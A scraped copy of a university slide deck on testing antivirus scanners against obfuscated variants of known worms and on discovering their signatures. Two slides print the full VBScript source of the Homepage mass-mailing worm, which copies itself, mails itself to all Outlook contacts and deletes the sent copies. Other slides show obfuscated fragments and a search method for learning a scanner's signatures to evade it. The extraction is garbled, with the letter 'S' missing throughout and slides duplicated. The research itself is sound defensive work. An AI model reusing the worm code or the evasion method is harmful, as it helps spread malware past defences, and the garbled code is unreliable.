Testing Malware Detectors. Mihai Christodorescu Somesh Jha Wisconsin Safety Analyzer University of Wisconsin, Madison

Size: px

Start display at page:

Download "Testing Malware Detectors. Mihai Christodorescu Somesh Jha Wisconsin Safety Analyzer University of Wisconsin, Madison"

Nora Newman
6 years ago
Views:

1 Testing Malware Detectors omesh Jha Wisconsin afety Analyzer

2 Introduction A malware detector identifies malicious content (data, code). 2

3 Introduction A malware detector identifies malicious content (data, code). 3

4 Introduction A malware detector identifies malicious content (data, code). 4

5 Introduction A malware detector identifies malicious content (data, code). 5

6 Introduction A malware detector identifies malicious content (data, code). 6

7 Introduction A malware detector identifies malicious content (data, code). 7

8 Attack Model An attacker tries to make malware appear benign. 8

9 Evasive Maneuvers Obfuscation: same functionality, different form. Malware writers have many tools at their disposal Blackhat tools: MITFALL, CB Mutate,... Commercial tools: Cloakware, PECompact,... Example: the Beagle worm family 9

10 Renaming Obfuscation Fragment of Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) 10

11 Renaming Obfuscation Fragment of Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1) FO... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) FO 11

12 Renaming Obfuscation Fragment of Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1) FO... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) FO Obfuscated fragment of Homepage worm: On Error Resume Next... et will=rumor.opentextfile(wcript.criptfullname,1)... et ego=rumor.opentextfile(folder&"\homepage.html.vbs",2,true) 12

13 Encapsulation Obfuscation Fragment of the Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) 13

14 Encapsulation Obfuscation Fragment of the Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) Obfuscated fragment of the Homepage worm: Execute( decode( "4F6E F " ) )... Execute( decode( " E...462E " ) )... Execute( decode( "4C696E C660A" ) ) 14

15 Encapsulation Obfuscation Fragment of the Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) Obfuscated fragment of the Homepage worm: Execute( decode( "4F6E F " ) )... Execute( decode( " E...462E " ) )... Execute( decode( "4C696E C660A" ) ) 15

16 Encapsulation Obfuscation Fragment of the Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) Obfuscated fragment of the Homepage worm: Execute( decode( "4F6E F " ) )... Execute( decode( " E...462E " ) )... Execute( decode( "4C696E C660A" ) ) 16

17 Encapsulation Obfuscation Fragment of the Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) Obfuscated fragment of the Homepage worm: Execute( decode( "4F6E F " ) )... Execute( decode( " E...462E " ) )... Execute( decode( "4C696E C660A" ) ) 17

18 Encapsulation Obfuscation Fragment of the Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) Obfuscated fragment of the Homepage worm: Execute( decode( "4F6E F " ) )... Execute( decode( " E...462E " ) )... Execute( decode( "4C696E C660A" ) ) 18

19 How Detection Works Misuse detectors are malware detectors that use signatures to identify malicious code. In this talk: generic method illustrated with virus scanner and worm examples. 19

20 How Detection Works Misuse detectors are malware detectors that use signatures to identify malicious code. In this talk: generic method illustrated with virus scanner and worm examples. McAfee Viruscan signature for the Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) 20

21 How Detection Works On Error Resume Next et W = CreateObject("Wcript.hell") et FO= Createobject("scripting.filesystemobject") Folder=FO.GetpecialFolder(2) et InF=FO.OpenTextFile(Wcript.criptFullname,1) Do While InF.AtEndOftream<>True criptbuffer=criptbuffer&inf.readline&vbcrlf Loop et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) OutF.write criptbuffer OutF.close et FO=Nothing If W.regread ("HKCU\software\An\mailed") <> "1" then Mailit() End If et s=createobject("outlook.application") et t=s.getnamepace("mapi") et u=t.getdefaultfolder(6) For i=1 to u.items.count If u.items.item(i).subject="homepage" Then u.items.item(i).close u.items.item(i).delete End If Next et u=t.getdefaultfolder(3) For i=1 to u.items.count If u.items.item(i).subject="homepage" Then u.items.item(i).delete End If Next Randomize r=int((4*rnd)+1) If r=1 then W.Run(" elseif r=2 Then W.Run(" elseif r=3 Then W.Run(" ) ElseIf r=4 Then W.Run(" End If Function Mailit() On Error Resume Next et Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then et Mapi=Outlook.GetNamepace("MAPI") et Lists=Mapi.AddressLists For Each ListIndex In Lists If ListIndex.AddressEntries.Count <> 0 Then ContactCount = ListIndex.AddressEntries.Count For Count= 1 To ContactCount et Mail = Outlook.CreateItem(0) et Contact = ListIndex.AddressEntries(Count) Mail.To = Contact.Address Mail.ubject = "Homepage" Mail.Body = vbcrlf&"hi!"&vbcrlf&vbcrlf&"you've got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf et Attachment=Mail.Attachments Attachment.Add Folder & "\homepage.html.vbs" Mail.DeleteAfterubmit = True If Mail.To <> "" Then Mail.end W.regwrite "HKCU\software\An\mailed", "1" End If Next End If Next End if End Function 21

22 How Detection Works On Error Resume Next et W = CreateObject("Wcript.hell") et FO= Createobject("scripting.filesystemobject") Folder=FO.GetpecialFolder(2) et InF=FO.OpenTextFile(Wcript.criptFullname,1) Do While InF.AtEndOftream<>True criptbuffer=criptbuffer&inf.readline&vbcrlf Loop et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) OutF.write criptbuffer OutF.close et FO=Nothing If W.regread ("HKCU\software\An\mailed") <> "1" then Mailit() End If et s=createobject("outlook.application") et t=s.getnamepace("mapi") et u=t.getdefaultfolder(6) For i=1 to u.items.count If u.items.item(i).subject="homepage" Then u.items.item(i).close u.items.item(i).delete End If Next et u=t.getdefaultfolder(3) For i=1 to u.items.count If u.items.item(i).subject="homepage" Then u.items.item(i).delete End If Next Randomize r=int((4*rnd)+1) If r=1 then W.Run(" elseif r=2 Then W.Run(" elseif r=3 Then W.Run(" ) ElseIf r=4 Then W.Run(" End If Function Mailit() On Error Resume Next et Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then et Mapi=Outlook.GetNamepace("MAPI") et Lists=Mapi.AddressLists For Each ListIndex In Lists If ListIndex.AddressEntries.Count <> 0 Then ContactCount = ListIndex.AddressEntries.Count For Count= 1 To ContactCount et Mail = Outlook.CreateItem(0) et Contact = ListIndex.AddressEntries(Count) Mail.To = Contact.Address Mail.ubject = "Homepage" Mail.Body = vbcrlf&"hi!"&vbcrlf&vbcrlf&"you've got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf et Attachment=Mail.Attachments Attachment.Add Folder & "\homepage.html.vbs" Mail.DeleteAfterubmit = True If Mail.To <> "" Then Mail.end W.regwrite "HKCU\software\An\mailed", "1" End If Next End If Next End if End Function 22

23 Testing Goal: Resilience Motivation: Obfuscation libraries are plentiful. Worm families use incremental obfuscations. Need to assess resilience to obfuscation. 23

Need to assess resilience to obfuscation.

24 Testing Goal: Resilience Motivation: Obfuscation libraries are plentiful. Worm families use incremental obfuscations. Need to assess resilience to obfuscation. Current AV certification is inadequate. Checks only detection of existing malware at a given point in time. 24

25 Testing Goal: Resilience Question 1: How resistant is a virus scanner to obfuscations or variants of known worms? Question 2: Using the limitations of a virus scanner, can a blackhat determine its detection algorithm? 25

26 Testing Methodology 1. Random testing for resilience assessment Use obfuscation transformations to generate worm instances to be used as test samples. 26

27 Testing Methodology 1. Random testing for resilience assessment Use obfuscation transformations to generate worm instances to be used as test samples. 2. Adaptive testing for signature discovery Use virus scanner detection rates on obfuscated worm instances to learn the signature employed. 27

28 Roadmap Introduction Goals Testing resilience to obfuscation ignature discovery Future work Conclusions 28

29 1. Random testing Worm Parameter Generator Detected / Not detected Obfuscation Algorithm Obfuscated Worm Virus canner 29

30 1. Random testing Worm Parameter Generator Variable renaming Code encapsulation Garbage insertion Code reordering Detected / Not detected Obfuscation Algorithm Obfuscated Worm Virus canner 30

31 1. Random testing Original worm 31

32 1. Random testing Original worm Renaming Obfuscated instances 32

33 1. Random testing Original worm Renaming Obfuscated instances Reordering 33

34 1. Random testing Original worm Renaming Obfuscated instances Reordering Garbage insertion 34

35 1. Random testing Original worm Homepage worm in Norton AV Obfuscated instances Detected Not detected Renaming Total 4432 Reordering Garbage insertion 35

36 1. Random testing Original worm Homepage worm in Norton AV Obfuscated instances Detected Not detected Renaming Total 4432 Reordering Garbage insertion 36

37 1. Random testing Original worm Homepage worm in Norton AV Obfuscated instances Detected Not detected Renaming Total 4432 Reordering False Negative Rate: 11.5% Garbage insertion 37

38 False Negative Rate by Worm Norton AntiVirus ophos Antivirus McAfee Virus can 100% 75% 50% 25% 0% 5% 0% Melissa Tune Chantal Anna Kournikova Homepage Lucky2 Gacript Yovp 38

39 False Negative Rate ophos cannot cope with obfuscations. by Worm Norton AntiVirus ophos Antivirus McAfee Virus can 100% 75% 50% 25% 0% 5% 0% Melissa Tune Chantal Anna Kournikova Homepage Lucky2 Gacript Yovp 39

40 False Negative Rate by Worm Norton AntiVirus ophos Antivirus McAfee Virus can 100% 75% 50% 25% 0% 5% 0% Melissa Tune Chantal Anna Kournikova Homepage Lucky2 Gacript Yovp No improvement over time. 40

41 False Negative Rate by Worm Norton AntiVirus ophos Antivirus McAfee Virus can 100% 75% 72% 75% 50% 53% 38% 25% 0% 5% 0% Melissa Tune Chantal Anna Kournikova 13% 13% Homepage Lucky2 Gacript Yovp 41

42 False Negative Rate Wild variation in false negative rates. by Worm Norton AntiVirus ophos Antivirus McAfee Virus can 100% 75% 72% 75% 50% 53% 38% 25% 0% 5% 0% Melissa Tune Chantal Anna Kournikova 13% 13% Homepage Lucky2 Gacript Yovp 42

43 False Negative Rate by Obfuscation 100% Norton AntiVirus ophos Antivirus McAfee Virus can 75% 50% 25% 0% 1% Variable renaming Hexadecimal encoding Code reordering Garbage insertion 43

44 False Negative Rate by Obfuscation 100% Norton AntiVirus ophos Antivirus McAfee Virus can 75% 50% 25% Variable renaming handled very well. 0% 1% Variable renaming Hexadecimal encoding Code reordering Garbage insertion 44

45 False Negative Rate Detection fails for both encapsulation and reordering. 100% by Obfuscation Norton AntiVirus ophos Antivirus McAfee Virus can 75% 50% 25% 0% 1% Variable renaming Hexadecimal encoding Code reordering Garbage insertion 45

46 Roadmap Introduction Goals Testing resilience to obfuscation ignature discovery Future work Conclusions 46

47 2. Adaptive Testing ignature discovery algorithm finds the K malware statements that, when obfuscated, create an undetectable malware variant. 1 2 K-1 K 47

48 2. Adaptive Testing ignature discovery algorithm finds the K malware statements that, when obfuscated, create an undetectable malware variant. 1 2 K-1 K We need an opaque obfuscation transformation. 48

49 ignature Discovery Worm Parameter Generator Detected / Not detected Opaque Obfuscation Obfuscated Worm Virus canner 49

50 ignature Discovery Worm Parameter Generator Detected / Not detected Opaque Obfuscation Obfuscated Worm Virus canner 50

51 ignature Discovery Algorithm Original worm 51

52 ignature Discovery Algorithm Original worm 1 st obfuscated instance 52

53 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 53

54 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance 54

55 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance Not detected 55

56 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance Not detected 3 rd obfuscated instance 56

57 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance Not detected 3 rd obfuscated instance Detected 57

58 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance Not detected 3 rd obfuscated instance Detected 4 th obfuscated instance 58

59 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance Not detected 3 rd obfuscated instance Detected 4 th obfuscated instance Not detected 59

60 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance Not detected 3 rd obfuscated instance Detected 4 th obfuscated instance Not detected Done. 60

61 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance Not detected 3 rd obfuscated instance Detected 4 th obfuscated instance Not detected Done. One signature element found in O(log N). 61

62 ignature Discovery Algorithm By biasing the search towards the left, we can find the leftmost signature element. 62

63 ignature Discovery Algorithm By biasing the search towards the left, we can find the leftmost signature element. earch range for second signature element. 63

64 ignature Discovery Algorithm By biasing the search towards the left, we can find the leftmost signature element. earch range for second signature element. Worst running time: O( K log N ) 64

65 Discovered ignatures Worm sample: Homepage Norton AntiVirus Attachment.Add Folder & "\homepage.html.vbs" ophos Antivirus The whole body of the malware. McAfee Virus can On Error Resume Next et InF = FO.OpenTextFile( Wcript.criptFullname, 1 ) et OutF = FO.OpenTextFile( Folder & "\homepage.html.vbs", 2, true ) 65

66 Discovered ignatures Worm sample: Homepage Norton AntiVirus Attachment.Add Folder & "\homepage.html.vbs" ophos Antivirus The whole body of the malware. McAfee Virus can On Error Resume Next et InF = FO.OpenTextFile( Wcript.criptFullname, 1 ) et OutF = FO.OpenTextFile( Folder & "\homepage.html.vbs", 2, true ) Norton AntiVirus ophos Antivirus McAfee Virus can a Homepage 66

67 What If... A virus writer uses signature information to thwart virus scanners. Each virus variant can now evade detection. Viruses can repeatedly try to enter a system, learning the signature in the process. 67

68 Roadmap Introduction Goals Testing resilience to obfuscation ignature discovery Future work Conclusions 68

69 Future Work Binary viruses. ame obfuscation techniques apply. Binary rewriting library work in progress. Refine the signature discovery algorithm. earch below instruction level. Detect more powerful signature classes. 69

70 Conclusions Obfuscation-based testing techniques are useful in comparing virus scanners. Commercial virus scanners have poor resilience to common obfuscation transformations. 70

71 Testing Malware Detectors omesh Jha Wisconsin afety Analyzer

Mihai Christodorescu Somesh Jha University of Wisconsin, Madison {mihai,

Semantics-Aware Mihai Christodorescu Somesh Jha University of Wisconsin, Madison {mihai, jha}@cs.wisc.edu Abstract A malware detector is a system that attempts to determine whether a program has malicious